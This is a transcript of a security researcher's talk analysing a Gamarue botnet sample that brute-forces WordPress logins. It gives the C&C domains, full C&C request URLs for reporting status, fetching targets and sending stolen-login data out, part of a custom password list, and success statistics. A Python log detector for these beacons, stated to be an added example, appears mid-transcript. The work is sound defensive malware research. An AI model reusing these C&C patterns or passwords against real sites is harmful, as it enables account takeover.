Insights of a brute-forcing botnet
Veronica Valeros, Cognitive Threat Analytics, Cisco Systems, Czech Republic

Posted on 11-Apr-2017

TRANSCRIPT

Page 1: Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]

Insights of a brute-forcing botnet

Veronica Valeros Cognitive Threat Analytics

Cisco Systems, Czech Republic

Page 2:

About me

Malware Researcher, Cognitive Threat Analytics (cognitive.cisco.com)

What I do:
•  Analysis of network traffic
•  Behavioral analysis of malware
•  Threat categorization
•  Malware sandboxing

Also:
•  Quadcopters, lockpicking, gaming, traveling

Twitter: @verovaleros
LinkedIn: /in/veronicavalerossaracho
Github: /verovaleros
Cisco: blogs.cisco.com/author/valeros

Page 3:

Hunting threats: what do we know about malware?

Page 4:

Intelligence gathering

Threat identification

Sources shown in the slide diagram: blogs, reports, trackers, real traffic, sandboxing, twitter, forums

Page 5:

Most of what we know about malware is from 1-5 minute sandbox executions

Most sandbox solutions (1-5 minutes)

Page 6:

How does the malware behave after 5 minutes? After 1 hour?

Page 7:

There is just one way to know: to try it.

Page 8:

Experiment Setup

Gamarue sample

Sandboxing environment:
•  VirtualBox
•  Windows XP
•  No guest additions
•  No user interaction
•  No hardening measures for VM-aware malware

Page 9:

Infection Overview

Page 10:

Gamarue C&C Characteristics:

•  HTTP-based C&C
•  HTTP POST requests
•  Encrypted data sent/received
•  Custom User-Agent "Mozilla/4.0"

•  Contacted C&C servers:
   •  okiijlijlili.eu
   •  w4gvnlw4kjbvrbvshkvbsd.ru
   •  f34234f234f2sdcsv.info

Page 11:

The main C&C is the one in charge of shaping the infection scenario

Page 12:

The main C&C is the one in charge of shaping the infection scenario

[Diagram: sequence of C&C contacts, each marked X]
X = no change on the behavior of the botnet
New malware: 9583ad7f17aa0d63a48aac802d08a7e

Page 13:

Brute-forcing botnet behavior

1.  Obtain from the C&C server a list of target WordPress sites to attempt to log in to.

2.  Attempt to log in to the next site on the list with the chosen credentials in order to gain access.

3.  If the login attempt was successful, report it to the C&C server.

4.  If the login attempt was unsuccessful, iterate from step 2) until exhausting the targets.

Page 14:

Brute-forcing C&C requests

(1) REPORT STATUS
http://g.commandocenter.ru/default.aspx?guid=dca94d1f-f7eb-487f-ad24-923cd1b4f946&gate=1&good=-1&bad=0&unlucky=1&ip=&fn=

(2) RETRIEVE TARGETS
http://g.commandocenter.ru/files/2/9d753bd0-33a5-46ac-841d-f99d9ace3446.txt

(3) SEND SUCCESS DATA
http://g.commandocenter.ru/col.aspx?t=wp b&g=1&gid=1
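From the defender's side, the three request shapes on this slide are enough to write a proxy-log detector, which is also the kind of data the talk's platform consumes (web access logs). The block below is an added example, not code from the talk or from Cisco CTA. It assumes a simplified, constructed log format of `<timestamp> <client_ip> <method> <url>`, uses the C&C host and paths shown above, and computes from the `good`/`bad` counters a bot reports home the same attempts-per-success ratio that slide 22 states (about one success per 7000 sites). The sample log lines, the `t=wp` placeholder for the garbled value in request (3), and the reading of `good=-1` as "no result yet" are all assumptions.

```python
"""Spot the brute-forcing bot's C&C beacons in web-proxy logs.

Added example, not code from the talk or from Cisco CTA. Assumes a constructed,
simplified proxy-log format ("<timestamp> <client_ip> <method> <url>") and uses
the three request shapes and the C&C host shown on slide 14 of the talk.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# C&C host seen in the slide 14 requests
CNC_HOSTS = {"g.commandocenter.ru"}

# The three request types the bot issues (slide 14)
STATUS_PATH = "/default.aspx"                                 # (1) report status
TARGETS_RE = re.compile(r"^/files/\d+/[0-9a-f-]{36}\.txt$")   # (2) retrieve targets
SUCCESS_PATH = "/col.aspx"                                    # (3) send success data

# Constructed sample log (not real traffic). The "t=" value of request (3) is
# garbled in the transcript, so "t=wp" below is a placeholder.
SAMPLE_LOG = """\
2017-04-11T10:00:01 10.0.0.5 GET http://g.commandocenter.ru/default.aspx?guid=dca94d1f-f7eb-487f-ad24-923cd1b4f946&gate=1&good=-1&bad=0&unlucky=1&ip=&fn=
2017-04-11T10:00:02 10.0.0.5 GET http://g.commandocenter.ru/files/2/9d753bd0-33a5-46ac-841d-f99d9ace3446.txt
2017-04-11T10:05:00 10.0.0.5 GET http://www.example.org/index.html
2017-04-11T13:30:00 10.0.0.5 GET http://g.commandocenter.ru/default.aspx?guid=dca94d1f-f7eb-487f-ad24-923cd1b4f946&gate=1&good=1&bad=6999&unlucky=0&ip=&fn=
2017-04-11T13:30:01 10.0.0.5 POST http://g.commandocenter.ru/col.aspx?t=wp&g=1&gid=1
2017-04-11T13:31:00 10.0.0.7 GET http://www.example.org/about.html
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def classify(url):
    """Return (kind, query): kind is 'status', 'targets', 'success' or None."""
    u = urlparse(url)
    if u.hostname not in CNC_HOSTS:
        return None, {}
    query = {k: v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    if u.path == STATUS_PATH and "guid" in query:
        return "status", query
    if TARGETS_RE.match(u.path):
        return "targets", query
    if u.path == SUCCESS_PATH:
        return "success", query
    return None, {}


def scan(log_text):
    """Collect C&C events per client and the latest good/bad/unlucky counters per bot guid."""
    events = defaultdict(list)   # client_ip -> [(timestamp, kind)]
    counters = {}                # (client_ip, guid) -> {"good": int, "bad": int, "unlucky": int}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, _method, url = m.groups()
        kind, query = classify(url)
        if kind is None:
            continue
        events[client].append((ts, kind))
        if kind == "status":
            # Later beacons overwrite earlier ones, so the last report wins.
            counters[(client, query["guid"])] = {
                key: int(query.get(key) or 0) for key in ("good", "bad", "unlucky")
            }
    return events, counters


def infected_clients(events):
    """Flag a client only when it both reported status and fetched a target list."""
    return sorted(c for c, ev in events.items()
                  if {"status", "targets"} <= {kind for _, kind in ev})


def attempts_per_success(counters):
    """Same ratio as slide 22 (about 7000 sites per success), computed per bot guid."""
    result = {}
    for (_client, guid), c in counters.items():
        # The first beacon on slide 14 carries good=-1; treated here as "no result
        # yet" (an assumption), so it is clamped to zero.
        good = max(c["good"], 0)
        result[guid] = (good + c["bad"]) / good if good else None
    return result


if __name__ == "__main__":
    ev, ctr = scan(SAMPLE_LOG)
    print("clients beaconing to the C&C:", infected_clients(ev))
    for guid, ratio in attempts_per_success(ctr).items():
        print(f"{guid}: {ratio} login attempts per success")
```

Requiring both a status beacon and a target-list fetch before flagging a client keeps a single stray request from raising an alert, while the per-guid counters let an analyst see how hard each bot has been working and how often it has succeeded.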

Page 15:

Brute-forcing C&C: report status

Page 16:

Brute-forcing C&C: retrieve targets

Page 17:

Brute-forcing C&C: send successful data

Page 18:

Brute-forcing C&C overview

REPORT STATUS, RETRIEVE TARGETS, SEND SUCCESS DATA

Page 19:

+86k custom passwords used

techno sciento biblioteka wroclaw media momb biblioteca teens cafe benessere playground helena guide mullion-shop albers-wende svenska-spelautomater survivalb

raumklimadecke dana capavle bondage bibliotheque modeistanbul virgulina svenskaspelautomater stephanierhea ravenna playgroundmusic pierrederoche pierre svet guidedtherapy galaktika enflick

dajuroka teentalk charlesmyrick businesscoaching business advertising advertise zorgverzekering xmarkstheearth xlgirls williampopp williammillsagency teens-generation tausend-moeglichkeiten sverigemastareiseo2011 surveyquest socialanna

sochy-14 shawnewbank shawkeller scienceofsexy rgb rautenstrauch playguitar ohiohypnosiscenter modedesign-studium mode-estah mode-b modculture merkur mediacube mediaclipsaustralia mediabiz-group marihuana

Page 20:

Highly aggressive botnet: thousands of targets attempted per day

Page 21:

+160k attempted logins

23 success cases

Page 22:

1 bot
Every 7000 sites, 1 success
1 access every ~3.5 hours
6 accessed sites per day

Page 23:

Not a targeted attack: well distributed

Page 24:

Conclusions

•  Running malware for long-term periods is worth trying.

•  A realistic sandbox environment is vital: without internet access we wouldn't have discovered this behavior.

•  The weakest link in security is still humans.

•  Education is the only long-term solution.

Page 25:

Questions?

Veronica Valeros [email protected]

Cognitive Threat Analytics Cisco Systems, Czech Republic

Page 26:

Thank you.

Page 27:

About Cisco Cognitive Threat Analytics

Cisco Cognitive Threat Analytics (CTA) is a cloud-based breach detection and analytics technology focused on discovering novel and emerging threats by identifying C&C activity of malware. CTA processes web access logs from the Cisco Cloud Web Security (CWS), Cisco Web Security Appliance (WSA), or third-party web proxies such as Blue Coat ProxySG. CTA reduces time to discovery (TTD) of threats operating inside the network. It addresses gaps in perimeter-based defenses by identifying the symptoms of a malware infection or data breach using behavioral analysis and anomaly detection. The technology relies on advanced statistical modeling and machine learning to independently identify new threats, while constantly learning from what it sees and adapting over time. Through additional careful correlation, CTA presents 100% confirmed breaches to keep security teams focused on the particular devices that require remediation. Focusing on C&C activity detection, CTA addresses a security visibility gap by discovering threats that may have entirely bypassed the web as an infection vector (infections delivered through email, infected USB stick, BYOD).